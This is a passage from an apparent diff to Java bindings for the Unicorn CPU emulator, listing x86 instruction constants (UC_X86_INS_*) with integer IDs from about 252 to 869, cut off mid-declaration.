UC_X86_INS_VCVTTSS2USI = 252; + public static final int UC_X86_INS_VCVTUSI2SD = 253; + public static final int UC_X86_INS_VCVTUSI2SS = 254; + public static final int UC_X86_INS_VUCOMISD = 255; + public static final int UC_X86_INS_VUCOMISS = 256; + public static final int UC_X86_INS_JAE = 257; + public static final int UC_X86_INS_JA = 258; + public static final int UC_X86_INS_JBE = 259; + public static final int UC_X86_INS_JB = 260; + public static final int UC_X86_INS_JCXZ = 261; + public static final int UC_X86_INS_JECXZ = 262; + public static final int UC_X86_INS_JE = 263; + public static final int UC_X86_INS_JGE = 264; + public static final int UC_X86_INS_JG = 265; + public static final int UC_X86_INS_JLE = 266; + public static final int UC_X86_INS_JL = 267; + public static final int UC_X86_INS_JMP = 268; + public static final int UC_X86_INS_JNE = 269; + public static final int UC_X86_INS_JNO = 270; + public static final int UC_X86_INS_JNP = 271; + public static final int UC_X86_INS_JNS = 272; + public static final int UC_X86_INS_JO = 273; + public static final int UC_X86_INS_JP = 274; + public static final int UC_X86_INS_JRCXZ = 275; + public static final int UC_X86_INS_JS = 276; + public static final int UC_X86_INS_KANDB = 277; + public static final int UC_X86_INS_KANDD = 278; + public static final int UC_X86_INS_KANDNB = 279; + public static final int UC_X86_INS_KANDND = 280; + public static final int UC_X86_INS_KANDNQ = 281; + public static final int UC_X86_INS_KANDNW = 282; + public static final int UC_X86_INS_KANDQ = 283; + public static final int UC_X86_INS_KANDW = 284; + public static final int UC_X86_INS_KMOVB = 285; + public static final int UC_X86_INS_KMOVD = 286; + public static final int UC_X86_INS_KMOVQ = 287; + public static final int UC_X86_INS_KMOVW = 288; + public static final int UC_X86_INS_KNOTB = 289; + public static final int UC_X86_INS_KNOTD = 290; + public static final int UC_X86_INS_KNOTQ = 291; + public static final int UC_X86_INS_KNOTW = 292; + public static final int UC_X86_INS_KORB = 293; + public static final int UC_X86_INS_KORD = 294; + public static final int UC_X86_INS_KORQ = 295; + public static final int UC_X86_INS_KORTESTB = 296; + public static final int UC_X86_INS_KORTESTD = 297; + public static final int UC_X86_INS_KORTESTQ = 298; + public static final int UC_X86_INS_KORTESTW = 299; + public static final int UC_X86_INS_KORW = 300; + public static final int UC_X86_INS_KSHIFTLB = 301; + public static final int UC_X86_INS_KSHIFTLD = 302; + public static final int UC_X86_INS_KSHIFTLQ = 303; + public static final int UC_X86_INS_KSHIFTLW = 304; + public static final int UC_X86_INS_KSHIFTRB = 305; + public static final int UC_X86_INS_KSHIFTRD = 306; + public static final int UC_X86_INS_KSHIFTRQ = 307; + public static final int UC_X86_INS_KSHIFTRW = 308; + public static final int UC_X86_INS_KUNPCKBW = 309; + public static final int UC_X86_INS_KXNORB = 310; + public static final int UC_X86_INS_KXNORD = 311; + public static final int UC_X86_INS_KXNORQ = 312; + public static final int UC_X86_INS_KXNORW = 313; + public static final int UC_X86_INS_KXORB = 314; + public static final int UC_X86_INS_KXORD = 315; + public static final int UC_X86_INS_KXORQ = 316; + public static final int UC_X86_INS_KXORW = 317; + public static final int UC_X86_INS_LAHF = 318; + public static final int UC_X86_INS_LAR = 319; + public static final int UC_X86_INS_LDDQU = 320; + public static final int UC_X86_INS_LDMXCSR = 321; + public static final int UC_X86_INS_LDS = 322; + public static final int UC_X86_INS_FLDZ = 323; + public static final int UC_X86_INS_FLD1 = 324; + public static final int UC_X86_INS_FLD = 325; + public static final int UC_X86_INS_LEA = 326; + public static final int UC_X86_INS_LEAVE = 327; + public static final int UC_X86_INS_LES = 328; + public static final int UC_X86_INS_LFENCE = 329; + public static final int UC_X86_INS_LFS = 330; + public static final int UC_X86_INS_LGDT = 331; + public static final int UC_X86_INS_LGS = 332; + public static final int UC_X86_INS_LIDT = 333; + public static final int UC_X86_INS_LLDT = 334; + public static final int UC_X86_INS_LMSW = 335; + public static final int UC_X86_INS_OR = 336; + public static final int UC_X86_INS_SUB = 337; + public static final int UC_X86_INS_XOR = 338; + public static final int UC_X86_INS_LODSB = 339; + public static final int UC_X86_INS_LODSD = 340; + public static final int UC_X86_INS_LODSQ = 341; + public static final int UC_X86_INS_LODSW = 342; + public static final int UC_X86_INS_LOOP = 343; + public static final int UC_X86_INS_LOOPE = 344; + public static final int UC_X86_INS_LOOPNE = 345; + public static final int UC_X86_INS_RETF = 346; + public static final int UC_X86_INS_RETFQ = 347; + public static final int UC_X86_INS_LSL = 348; + public static final int UC_X86_INS_LSS = 349; + public static final int UC_X86_INS_LTR = 350; + public static final int UC_X86_INS_XADD = 351; + public static final int UC_X86_INS_LZCNT = 352; + public static final int UC_X86_INS_MASKMOVDQU = 353; + public static final int UC_X86_INS_MAXPD = 354; + public static final int UC_X86_INS_MAXPS = 355; + public static final int UC_X86_INS_MAXSD = 356; + public static final int UC_X86_INS_MAXSS = 357; + public static final int UC_X86_INS_MFENCE = 358; + public static final int UC_X86_INS_MINPD = 359; + public static final int UC_X86_INS_MINPS = 360; + public static final int UC_X86_INS_MINSD = 361; + public static final int UC_X86_INS_MINSS = 362; + public static final int UC_X86_INS_CVTPD2PI = 363; + public static final int UC_X86_INS_CVTPI2PD = 364; + public static final int UC_X86_INS_CVTPI2PS = 365; + public static final int UC_X86_INS_CVTPS2PI = 366; + public static final int UC_X86_INS_CVTTPD2PI = 367; + public static final int UC_X86_INS_CVTTPS2PI = 368; + public static final int UC_X86_INS_EMMS = 369; + public static final int UC_X86_INS_MASKMOVQ = 370; + public static final int UC_X86_INS_MOVD = 371; + public static final int UC_X86_INS_MOVDQ2Q = 372; + public static final int UC_X86_INS_MOVNTQ = 373; + public static final int UC_X86_INS_MOVQ2DQ = 374; + public static final int UC_X86_INS_MOVQ = 375; + public static final int UC_X86_INS_PABSB = 376; + public static final int UC_X86_INS_PABSD = 377; + public static final int UC_X86_INS_PABSW = 378; + public static final int UC_X86_INS_PACKSSDW = 379; + public static final int UC_X86_INS_PACKSSWB = 380; + public static final int UC_X86_INS_PACKUSWB = 381; + public static final int UC_X86_INS_PADDB = 382; + public static final int UC_X86_INS_PADDD = 383; + public static final int UC_X86_INS_PADDQ = 384; + public static final int UC_X86_INS_PADDSB = 385; + public static final int UC_X86_INS_PADDSW = 386; + public static final int UC_X86_INS_PADDUSB = 387; + public static final int UC_X86_INS_PADDUSW = 388; + public static final int UC_X86_INS_PADDW = 389; + public static final int UC_X86_INS_PALIGNR = 390; + public static final int UC_X86_INS_PANDN = 391; + public static final int UC_X86_INS_PAND = 392; + public static final int UC_X86_INS_PAVGB = 393; + public static final int UC_X86_INS_PAVGW = 394; + public static final int UC_X86_INS_PCMPEQB = 395; + public static final int UC_X86_INS_PCMPEQD = 396; + public static final int UC_X86_INS_PCMPEQW = 397; + public static final int UC_X86_INS_PCMPGTB = 398; + public static final int UC_X86_INS_PCMPGTD = 399; + public static final int UC_X86_INS_PCMPGTW = 400; + public static final int UC_X86_INS_PEXTRW = 401; + public static final int UC_X86_INS_PHADDSW = 402; + public static final int UC_X86_INS_PHADDW = 403; + public static final int UC_X86_INS_PHADDD = 404; + public static final int UC_X86_INS_PHSUBD = 405; + public static final int UC_X86_INS_PHSUBSW = 406; + public static final int UC_X86_INS_PHSUBW = 407; + public static final int UC_X86_INS_PINSRW = 408; + public static final int UC_X86_INS_PMADDUBSW = 409; + public static final int UC_X86_INS_PMADDWD = 410; + public static final int UC_X86_INS_PMAXSW = 411; + public static final int UC_X86_INS_PMAXUB = 412; + public static final int UC_X86_INS_PMINSW = 413; + public static final int UC_X86_INS_PMINUB = 414; + public static final int UC_X86_INS_PMOVMSKB = 415; + public static final int UC_X86_INS_PMULHRSW = 416; + public static final int UC_X86_INS_PMULHUW = 417; + public static final int UC_X86_INS_PMULHW = 418; + public static final int UC_X86_INS_PMULLW = 419; + public static final int UC_X86_INS_PMULUDQ = 420; + public static final int UC_X86_INS_POR = 421; + public static final int UC_X86_INS_PSADBW = 422; + public static final int UC_X86_INS_PSHUFB = 423; + public static final int UC_X86_INS_PSHUFW = 424; + public static final int UC_X86_INS_PSIGNB = 425; + public static final int UC_X86_INS_PSIGND = 426; + public static final int UC_X86_INS_PSIGNW = 427; + public static final int UC_X86_INS_PSLLD = 428; + public static final int UC_X86_INS_PSLLQ = 429; + public static final int UC_X86_INS_PSLLW = 430; + public static final int UC_X86_INS_PSRAD = 431; + public static final int UC_X86_INS_PSRAW = 432; + public static final int UC_X86_INS_PSRLD = 433; + public static final int UC_X86_INS_PSRLQ = 434; + public static final int UC_X86_INS_PSRLW = 435; + public static final int UC_X86_INS_PSUBB = 436; + public static final int UC_X86_INS_PSUBD = 437; + public static final int UC_X86_INS_PSUBQ = 438; + public static final int UC_X86_INS_PSUBSB = 439; + public static final int UC_X86_INS_PSUBSW = 440; + public static final int UC_X86_INS_PSUBUSB = 441; + public static final int UC_X86_INS_PSUBUSW = 442; + public static final int UC_X86_INS_PSUBW = 443; + public static final int UC_X86_INS_PUNPCKHBW = 444; + public static final int UC_X86_INS_PUNPCKHDQ = 445; + public static final int UC_X86_INS_PUNPCKHWD = 446; + public static final int UC_X86_INS_PUNPCKLBW = 447; + public static final int UC_X86_INS_PUNPCKLDQ = 448; + public static final int UC_X86_INS_PUNPCKLWD = 449; + public static final int UC_X86_INS_PXOR = 450; + public static final int UC_X86_INS_MONITOR = 451; + public static final int UC_X86_INS_MONTMUL = 452; + public static final int UC_X86_INS_MOV = 453; + public static final int UC_X86_INS_MOVABS = 454; + public static final int UC_X86_INS_MOVBE = 455; + public static final int UC_X86_INS_MOVDDUP = 456; + public static final int UC_X86_INS_MOVDQA = 457; + public static final int UC_X86_INS_MOVDQU = 458; + public static final int UC_X86_INS_MOVHLPS = 459; + public static final int UC_X86_INS_MOVHPD = 460; + public static final int UC_X86_INS_MOVHPS = 461; + public static final int UC_X86_INS_MOVLHPS = 462; + public static final int UC_X86_INS_MOVLPD = 463; + public static final int UC_X86_INS_MOVLPS = 464; + public static final int UC_X86_INS_MOVMSKPD = 465; + public static final int UC_X86_INS_MOVMSKPS = 466; + public static final int UC_X86_INS_MOVNTDQA = 467; + public static final int UC_X86_INS_MOVNTDQ = 468; + public static final int UC_X86_INS_MOVNTI = 469; + public static final int UC_X86_INS_MOVNTPD = 470; + public static final int UC_X86_INS_MOVNTPS = 471; + public static final int UC_X86_INS_MOVNTSD = 472; + public static final int UC_X86_INS_MOVNTSS = 473; + public static final int UC_X86_INS_MOVSB = 474; + public static final int UC_X86_INS_MOVSD = 475; + public static final int UC_X86_INS_MOVSHDUP = 476; + public static final int UC_X86_INS_MOVSLDUP = 477; + public static final int UC_X86_INS_MOVSQ = 478; + public static final int UC_X86_INS_MOVSS = 479; + public static final int UC_X86_INS_MOVSW = 480; + public static final int UC_X86_INS_MOVSX = 481; + public static final int UC_X86_INS_MOVSXD = 482; + public static final int UC_X86_INS_MOVUPD = 483; + public static final int UC_X86_INS_MOVUPS = 484; + public static final int UC_X86_INS_MOVZX = 485; + public static final int UC_X86_INS_MPSADBW = 486; + public static final int UC_X86_INS_MUL = 487; + public static final int UC_X86_INS_MULPD = 488; + public static final int UC_X86_INS_MULPS = 489; + public static final int UC_X86_INS_MULSD = 490; + public static final int UC_X86_INS_MULSS = 491; + public static final int UC_X86_INS_MULX = 492; + public static final int UC_X86_INS_FMUL = 493; + public static final int UC_X86_INS_FIMUL = 494; + public static final int UC_X86_INS_FMULP = 495; + public static final int UC_X86_INS_MWAIT = 496; + public static final int UC_X86_INS_NEG = 497; + public static final int UC_X86_INS_NOP = 498; + public static final int UC_X86_INS_NOT = 499; + public static final int UC_X86_INS_OUT = 500; + public static final int UC_X86_INS_OUTSB = 501; + public static final int UC_X86_INS_OUTSD = 502; + public static final int UC_X86_INS_OUTSW = 503; + public static final int UC_X86_INS_PACKUSDW = 504; + public static final int UC_X86_INS_PAUSE = 505; + public static final int UC_X86_INS_PAVGUSB = 506; + public static final int UC_X86_INS_PBLENDVB = 507; + public static final int UC_X86_INS_PBLENDW = 508; + public static final int UC_X86_INS_PCLMULQDQ = 509; + public static final int UC_X86_INS_PCMPEQQ = 510; + public static final int UC_X86_INS_PCMPESTRI = 511; + public static final int UC_X86_INS_PCMPESTRM = 512; + public static final int UC_X86_INS_PCMPGTQ = 513; + public static final int UC_X86_INS_PCMPISTRI = 514; + public static final int UC_X86_INS_PCMPISTRM = 515; + public static final int UC_X86_INS_PCOMMIT = 516; + public static final int UC_X86_INS_PDEP = 517; + public static final int UC_X86_INS_PEXT = 518; + public static final int UC_X86_INS_PEXTRB = 519; + public static final int UC_X86_INS_PEXTRD = 520; + public static final int UC_X86_INS_PEXTRQ = 521; + public static final int UC_X86_INS_PF2ID = 522; + public static final int UC_X86_INS_PF2IW = 523; + public static final int UC_X86_INS_PFACC = 524; + public static final int UC_X86_INS_PFADD = 525; + public static final int UC_X86_INS_PFCMPEQ = 526; + public static final int UC_X86_INS_PFCMPGE = 527; + public static final int UC_X86_INS_PFCMPGT = 528; + public static final int UC_X86_INS_PFMAX = 529; + public static final int UC_X86_INS_PFMIN = 530; + public static final int UC_X86_INS_PFMUL = 531; + public static final int UC_X86_INS_PFNACC = 532; + public static final int UC_X86_INS_PFPNACC = 533; + public static final int UC_X86_INS_PFRCPIT1 = 534; + public static final int UC_X86_INS_PFRCPIT2 = 535; + public static final int UC_X86_INS_PFRCP = 536; + public static final int UC_X86_INS_PFRSQIT1 = 537; + public static final int UC_X86_INS_PFRSQRT = 538; + public static final int UC_X86_INS_PFSUBR = 539; + public static final int UC_X86_INS_PFSUB = 540; + public static final int UC_X86_INS_PHMINPOSUW = 541; + public static final int UC_X86_INS_PI2FD = 542; + public static final int UC_X86_INS_PI2FW = 543; + public static final int UC_X86_INS_PINSRB = 544; + public static final int UC_X86_INS_PINSRD = 545; + public static final int UC_X86_INS_PINSRQ = 546; + public static final int UC_X86_INS_PMAXSB = 547; + public static final int UC_X86_INS_PMAXSD = 548; + public static final int UC_X86_INS_PMAXUD = 549; + public static final int UC_X86_INS_PMAXUW = 550; + public static final int UC_X86_INS_PMINSB = 551; + public static final int UC_X86_INS_PMINSD = 552; + public static final int UC_X86_INS_PMINUD = 553; + public static final int UC_X86_INS_PMINUW = 554; + public static final int UC_X86_INS_PMOVSXBD = 555; + public static final int UC_X86_INS_PMOVSXBQ = 556; + public static final int UC_X86_INS_PMOVSXBW = 557; + public static final int UC_X86_INS_PMOVSXDQ = 558; + public static final int UC_X86_INS_PMOVSXWD = 559; + public static final int UC_X86_INS_PMOVSXWQ = 560; + public static final int UC_X86_INS_PMOVZXBD = 561; + public static final int UC_X86_INS_PMOVZXBQ = 562; + public static final int UC_X86_INS_PMOVZXBW = 563; + public static final int UC_X86_INS_PMOVZXDQ = 564; + public static final int UC_X86_INS_PMOVZXWD = 565; + public static final int UC_X86_INS_PMOVZXWQ = 566; + public static final int UC_X86_INS_PMULDQ = 567; + public static final int UC_X86_INS_PMULHRW = 568; + public static final int UC_X86_INS_PMULLD = 569; + public static final int UC_X86_INS_POP = 570; + public static final int UC_X86_INS_POPAW = 571; + public static final int UC_X86_INS_POPAL = 572; + public static final int UC_X86_INS_POPCNT = 573; + public static final int UC_X86_INS_POPF = 574; + public static final int UC_X86_INS_POPFD = 575; + public static final int UC_X86_INS_POPFQ = 576; + public static final int UC_X86_INS_PREFETCH = 577; + public static final int UC_X86_INS_PREFETCHNTA = 578; + public static final int UC_X86_INS_PREFETCHT0 = 579; + public static final int UC_X86_INS_PREFETCHT1 = 580; + public static final int UC_X86_INS_PREFETCHT2 = 581; + public static final int UC_X86_INS_PREFETCHW = 582; + public static final int UC_X86_INS_PSHUFD = 583; + public static final int UC_X86_INS_PSHUFHW = 584; + public static final int UC_X86_INS_PSHUFLW = 585; + public static final int UC_X86_INS_PSLLDQ = 586; + public static final int UC_X86_INS_PSRLDQ = 587; + public static final int UC_X86_INS_PSWAPD = 588; + public static final int UC_X86_INS_PTEST = 589; + public static final int UC_X86_INS_PUNPCKHQDQ = 590; + public static final int UC_X86_INS_PUNPCKLQDQ = 591; + public static final int UC_X86_INS_PUSH = 592; + public static final int UC_X86_INS_PUSHAW = 593; + public static final int UC_X86_INS_PUSHAL = 594; + public static final int UC_X86_INS_PUSHF = 595; + public static final int UC_X86_INS_PUSHFD = 596; + public static final int UC_X86_INS_PUSHFQ = 597; + public static final int UC_X86_INS_RCL = 598; + public static final int UC_X86_INS_RCPPS = 599; + public static final int UC_X86_INS_RCPSS = 600; + public static final int UC_X86_INS_RCR = 601; + public static final int UC_X86_INS_RDFSBASE = 602; + public static final int UC_X86_INS_RDGSBASE = 603; + public static final int UC_X86_INS_RDMSR = 604; + public static final int UC_X86_INS_RDPMC = 605; + public static final int UC_X86_INS_RDRAND = 606; + public static final int UC_X86_INS_RDSEED = 607; + public static final int UC_X86_INS_RDTSC = 608; + public static final int UC_X86_INS_RDTSCP = 609; + public static final int UC_X86_INS_ROL = 610; + public static final int UC_X86_INS_ROR = 611; + public static final int UC_X86_INS_RORX = 612; + public static final int UC_X86_INS_ROUNDPD = 613; + public static final int UC_X86_INS_ROUNDPS = 614; + public static final int UC_X86_INS_ROUNDSD = 615; + public static final int UC_X86_INS_ROUNDSS = 616; + public static final int UC_X86_INS_RSM = 617; + public static final int UC_X86_INS_RSQRTPS = 618; + public static final int UC_X86_INS_RSQRTSS = 619; + public static final int UC_X86_INS_SAHF = 620; + public static final int UC_X86_INS_SAL = 621; + public static final int UC_X86_INS_SALC = 622; + public static final int UC_X86_INS_SAR = 623; + public static final int UC_X86_INS_SARX = 624; + public static final int UC_X86_INS_SBB = 625; + public static final int UC_X86_INS_SCASB = 626; + public static final int UC_X86_INS_SCASD = 627; + public static final int UC_X86_INS_SCASQ = 628; + public static final int UC_X86_INS_SCASW = 629; + public static final int UC_X86_INS_SETAE = 630; + public static final int UC_X86_INS_SETA = 631; + public static final int UC_X86_INS_SETBE = 632; + public static final int UC_X86_INS_SETB = 633; + public static final int UC_X86_INS_SETE = 634; + public static final int UC_X86_INS_SETGE = 635; + public static final int UC_X86_INS_SETG = 636; + public static final int UC_X86_INS_SETLE = 637; + public static final int UC_X86_INS_SETL = 638; + public static final int UC_X86_INS_SETNE = 639; + public static final int UC_X86_INS_SETNO = 640; + public static final int UC_X86_INS_SETNP = 641; + public static final int UC_X86_INS_SETNS = 642; + public static final int UC_X86_INS_SETO = 643; + public static final int UC_X86_INS_SETP = 644; + public static final int UC_X86_INS_SETS = 645; + public static final int UC_X86_INS_SFENCE = 646; + public static final int UC_X86_INS_SGDT = 647; + public static final int UC_X86_INS_SHA1MSG1 = 648; + public static final int UC_X86_INS_SHA1MSG2 = 649; + public static final int UC_X86_INS_SHA1NEXTE = 650; + public static final int UC_X86_INS_SHA1RNDS4 = 651; + public static final int UC_X86_INS_SHA256MSG1 = 652; + public static final int UC_X86_INS_SHA256MSG2 = 653; + public static final int UC_X86_INS_SHA256RNDS2 = 654; + public static final int UC_X86_INS_SHL = 655; + public static final int UC_X86_INS_SHLD = 656; + public static final int UC_X86_INS_SHLX = 657; + public static final int UC_X86_INS_SHR = 658; + public static final int UC_X86_INS_SHRD = 659; + public static final int UC_X86_INS_SHRX = 660; + public static final int UC_X86_INS_SHUFPD = 661; + public static final int UC_X86_INS_SHUFPS = 662; + public static final int UC_X86_INS_SIDT = 663; + public static final int UC_X86_INS_FSIN = 664; + public static final int UC_X86_INS_SKINIT = 665; + public static final int UC_X86_INS_SLDT = 666; + public static final int UC_X86_INS_SMSW = 667; + public static final int UC_X86_INS_SQRTPD = 668; + public static final int UC_X86_INS_SQRTPS = 669; + public static final int UC_X86_INS_SQRTSD = 670; + public static final int UC_X86_INS_SQRTSS = 671; + public static final int UC_X86_INS_FSQRT = 672; + public static final int UC_X86_INS_STAC = 673; + public static final int UC_X86_INS_STC = 674; + public static final int UC_X86_INS_STD = 675; + public static final int UC_X86_INS_STGI = 676; + public static final int UC_X86_INS_STI = 677; + public static final int UC_X86_INS_STMXCSR = 678; + public static final int UC_X86_INS_STOSB = 679; + public static final int UC_X86_INS_STOSD = 680; + public static final int UC_X86_INS_STOSQ = 681; + public static final int UC_X86_INS_STOSW = 682; + public static final int UC_X86_INS_STR = 683; + public static final int UC_X86_INS_FST = 684; + public static final int UC_X86_INS_FSTP = 685; + public static final int UC_X86_INS_FSTPNCE = 686; + public static final int UC_X86_INS_FXCH = 687; + public static final int UC_X86_INS_SUBPD = 688; + public static final int UC_X86_INS_SUBPS = 689; + public static final int UC_X86_INS_FSUBR = 690; + public static final int UC_X86_INS_FISUBR = 691; + public static final int UC_X86_INS_FSUBRP = 692; + public static final int UC_X86_INS_SUBSD = 693; + public static final int UC_X86_INS_SUBSS = 694; + public static final int UC_X86_INS_FSUB = 695; + public static final int UC_X86_INS_FISUB = 696; + public static final int UC_X86_INS_FSUBP = 697; + public static final int UC_X86_INS_SWAPGS = 698; + public static final int UC_X86_INS_SYSCALL = 699; + public static final int UC_X86_INS_SYSENTER = 700; + public static final int UC_X86_INS_SYSEXIT = 701; + public static final int UC_X86_INS_SYSRET = 702; + public static final int UC_X86_INS_T1MSKC = 703; + public static final int UC_X86_INS_TEST = 704; + public static final int UC_X86_INS_UD2 = 705; + public static final int UC_X86_INS_FTST = 706; + public static final int UC_X86_INS_TZCNT = 707; + public static final int UC_X86_INS_TZMSK = 708; + public static final int UC_X86_INS_FUCOMPI = 709; + public static final int UC_X86_INS_FUCOMI = 710; + public static final int UC_X86_INS_FUCOMPP = 711; + public static final int UC_X86_INS_FUCOMP = 712; + public static final int UC_X86_INS_FUCOM = 713; + public static final int UC_X86_INS_UD2B = 714; + public static final int UC_X86_INS_UNPCKHPD = 715; + public static final int UC_X86_INS_UNPCKHPS = 716; + public static final int UC_X86_INS_UNPCKLPD = 717; + public static final int UC_X86_INS_UNPCKLPS = 718; + public static final int UC_X86_INS_VADDPD = 719; + public static final int UC_X86_INS_VADDPS = 720; + public static final int UC_X86_INS_VADDSD = 721; + public static final int UC_X86_INS_VADDSS = 722; + public static final int UC_X86_INS_VADDSUBPD = 723; + public static final int UC_X86_INS_VADDSUBPS = 724; + public static final int UC_X86_INS_VAESDECLAST = 725; + public static final int UC_X86_INS_VAESDEC = 726; + public static final int UC_X86_INS_VAESENCLAST = 727; + public static final int UC_X86_INS_VAESENC = 728; + public static final int UC_X86_INS_VAESIMC = 729; + public static final int UC_X86_INS_VAESKEYGENASSIST = 730; + public static final int UC_X86_INS_VALIGND = 731; + public static final int UC_X86_INS_VALIGNQ = 732; + public static final int UC_X86_INS_VANDNPD = 733; + public static final int UC_X86_INS_VANDNPS = 734; + public static final int UC_X86_INS_VANDPD = 735; + public static final int UC_X86_INS_VANDPS = 736; + public static final int UC_X86_INS_VBLENDMPD = 737; + public static final int UC_X86_INS_VBLENDMPS = 738; + public static final int UC_X86_INS_VBLENDPD = 739; + public static final int UC_X86_INS_VBLENDPS = 740; + public static final int UC_X86_INS_VBLENDVPD = 741; + public static final int UC_X86_INS_VBLENDVPS = 742; + public static final int UC_X86_INS_VBROADCASTF128 = 743; + public static final int UC_X86_INS_VBROADCASTI32X4 = 744; + public static final int UC_X86_INS_VBROADCASTI64X4 = 745; + public static final int UC_X86_INS_VBROADCASTSD = 746; + public static final int UC_X86_INS_VBROADCASTSS = 747; + public static final int UC_X86_INS_VCMPPD = 748; + public static final int UC_X86_INS_VCMPPS = 749; + public static final int UC_X86_INS_VCMPSD = 750; + public static final int UC_X86_INS_VCMPSS = 751; + public static final int UC_X86_INS_VCOMPRESSPD = 752; + public static final int UC_X86_INS_VCOMPRESSPS = 753; + public static final int UC_X86_INS_VCVTDQ2PD = 754; + public static final int UC_X86_INS_VCVTDQ2PS = 755; + public static final int UC_X86_INS_VCVTPD2DQX = 756; + public static final int UC_X86_INS_VCVTPD2DQ = 757; + public static final int UC_X86_INS_VCVTPD2PSX = 758; + public static final int UC_X86_INS_VCVTPD2PS = 759; + public static final int UC_X86_INS_VCVTPD2UDQ = 760; + public static final int UC_X86_INS_VCVTPH2PS = 761; + public static final int UC_X86_INS_VCVTPS2DQ = 762; + public static final int UC_X86_INS_VCVTPS2PD = 763; + public static final int UC_X86_INS_VCVTPS2PH = 764; + public static final int UC_X86_INS_VCVTPS2UDQ = 765; + public static final int UC_X86_INS_VCVTSD2SI = 766; + public static final int UC_X86_INS_VCVTSD2USI = 767; + public static final int UC_X86_INS_VCVTSS2SI = 768; + public static final int UC_X86_INS_VCVTSS2USI = 769; + public static final int UC_X86_INS_VCVTTPD2DQX = 770; + public static final int UC_X86_INS_VCVTTPD2DQ = 771; + public static final int UC_X86_INS_VCVTTPD2UDQ = 772; + public static final int UC_X86_INS_VCVTTPS2DQ = 773; + public static final int UC_X86_INS_VCVTTPS2UDQ = 774; + public static final int UC_X86_INS_VCVTUDQ2PD = 775; + public static final int UC_X86_INS_VCVTUDQ2PS = 776; + public static final int UC_X86_INS_VDIVPD = 777; + public static final int UC_X86_INS_VDIVPS = 778; + public static final int UC_X86_INS_VDIVSD = 779; + public static final int UC_X86_INS_VDIVSS = 780; + public static final int UC_X86_INS_VDPPD = 781; + public static final int UC_X86_INS_VDPPS = 782; + public static final int UC_X86_INS_VERR = 783; + public static final int UC_X86_INS_VERW = 784; + public static final int UC_X86_INS_VEXP2PD = 785; + public static final int UC_X86_INS_VEXP2PS = 786; + public static final int UC_X86_INS_VEXPANDPD = 787; + public static final int UC_X86_INS_VEXPANDPS = 788; + public static final int UC_X86_INS_VEXTRACTF128 = 789; + public static final int UC_X86_INS_VEXTRACTF32X4 = 790; + public static final int UC_X86_INS_VEXTRACTF64X4 = 791; + public static final int UC_X86_INS_VEXTRACTI128 = 792; + public static final int UC_X86_INS_VEXTRACTI32X4 = 793; + public static final int UC_X86_INS_VEXTRACTI64X4 = 794; + public static final int UC_X86_INS_VEXTRACTPS = 795; + public static final int UC_X86_INS_VFMADD132PD = 796; + public static final int UC_X86_INS_VFMADD132PS = 797; + public static final int UC_X86_INS_VFMADDPD = 798; + public static final int UC_X86_INS_VFMADD213PD = 799; + public static final int UC_X86_INS_VFMADD231PD = 800; + public static final int UC_X86_INS_VFMADDPS = 801; + public static final int UC_X86_INS_VFMADD213PS = 802; + public static final int UC_X86_INS_VFMADD231PS = 803; + public static final int UC_X86_INS_VFMADDSD = 804; + public static final int UC_X86_INS_VFMADD213SD = 805; + public static final int UC_X86_INS_VFMADD132SD = 806; + public static final int UC_X86_INS_VFMADD231SD = 807; + public static final int UC_X86_INS_VFMADDSS = 808; + public static final int UC_X86_INS_VFMADD213SS = 809; + public static final int UC_X86_INS_VFMADD132SS = 810; + public static final int UC_X86_INS_VFMADD231SS = 811; + public static final int UC_X86_INS_VFMADDSUB132PD = 812; + public static final int UC_X86_INS_VFMADDSUB132PS = 813; + public static final int UC_X86_INS_VFMADDSUBPD = 814; + public static final int UC_X86_INS_VFMADDSUB213PD = 815; + public static final int UC_X86_INS_VFMADDSUB231PD = 816; + public static final int UC_X86_INS_VFMADDSUBPS = 817; + public static final int UC_X86_INS_VFMADDSUB213PS = 818; + public static final int UC_X86_INS_VFMADDSUB231PS = 819; + public static final int UC_X86_INS_VFMSUB132PD = 820; + public static final int UC_X86_INS_VFMSUB132PS = 821; + public static final int UC_X86_INS_VFMSUBADD132PD = 822; + public static final int UC_X86_INS_VFMSUBADD132PS = 823; + public static final int UC_X86_INS_VFMSUBADDPD = 824; + public static final int UC_X86_INS_VFMSUBADD213PD = 825; + public static final int UC_X86_INS_VFMSUBADD231PD = 826; + public static final int UC_X86_INS_VFMSUBADDPS = 827; + public static final int UC_X86_INS_VFMSUBADD213PS = 828; + public static final int UC_X86_INS_VFMSUBADD231PS = 829; + public static final int UC_X86_INS_VFMSUBPD = 830; + public static final int UC_X86_INS_VFMSUB213PD = 831; + public static final int UC_X86_INS_VFMSUB231PD = 832; + public static final int UC_X86_INS_VFMSUBPS = 833; + public static final int UC_X86_INS_VFMSUB213PS = 834; + public static final int UC_X86_INS_VFMSUB231PS = 835; + public static final int UC_X86_INS_VFMSUBSD = 836; + public static final int UC_X86_INS_VFMSUB213SD = 837; + public static final int UC_X86_INS_VFMSUB132SD = 838; + public static final int UC_X86_INS_VFMSUB231SD = 839; + public static final int UC_X86_INS_VFMSUBSS = 840; + public static final int UC_X86_INS_VFMSUB213SS = 841; + public static final int UC_X86_INS_VFMSUB132SS = 842; + public static final int UC_X86_INS_VFMSUB231SS = 843; + public static final int UC_X86_INS_VFNMADD132PD = 844; + public static final int UC_X86_INS_VFNMADD132PS = 845; + public static final int UC_X86_INS_VFNMADDPD = 846; + public static final int UC_X86_INS_VFNMADD213PD = 847; + public static final int UC_X86_INS_VFNMADD231PD = 848; + public static final int UC_X86_INS_VFNMADDPS = 849; + public static final int UC_X86_INS_VFNMADD213PS = 850; + public static final int UC_X86_INS_VFNMADD231PS = 851; + public static final int UC_X86_INS_VFNMADDSD = 852; + public static final int UC_X86_INS_VFNMADD213SD = 853; + public static final int UC_X86_INS_VFNMADD132SD = 854; + public static final int UC_X86_INS_VFNMADD231SD = 855; + public static final int UC_X86_INS_VFNMADDSS = 856; + public static final int UC_X86_INS_VFNMADD213SS = 857; + public static final int UC_X86_INS_VFNMADD132SS = 858; + public static final int UC_X86_INS_VFNMADD231SS = 859; + public static final int UC_X86_INS_VFNMSUB132PD = 860; + public static final int UC_X86_INS_VFNMSUB132PS = 861; + public static final int UC_X86_INS_VFNMSUBPD = 862; + public static final int UC_X86_INS_VFNMSUB213PD = 863; + public static final int UC_X86_INS_VFNMSUB231PD = 864; + public static final int UC_X86_INS_VFNMSUBPS = 865; + public static final int UC_X86_INS_VFNMSUB213PS = 866; + public static final int UC_X86_INS_VFNMSUB231PS = 867; + public static final int UC_X86_INS_VFNMSUBSD = 868; + public static final int UC_X86_INS_VFNMSUB213SD = 869; + public static final int 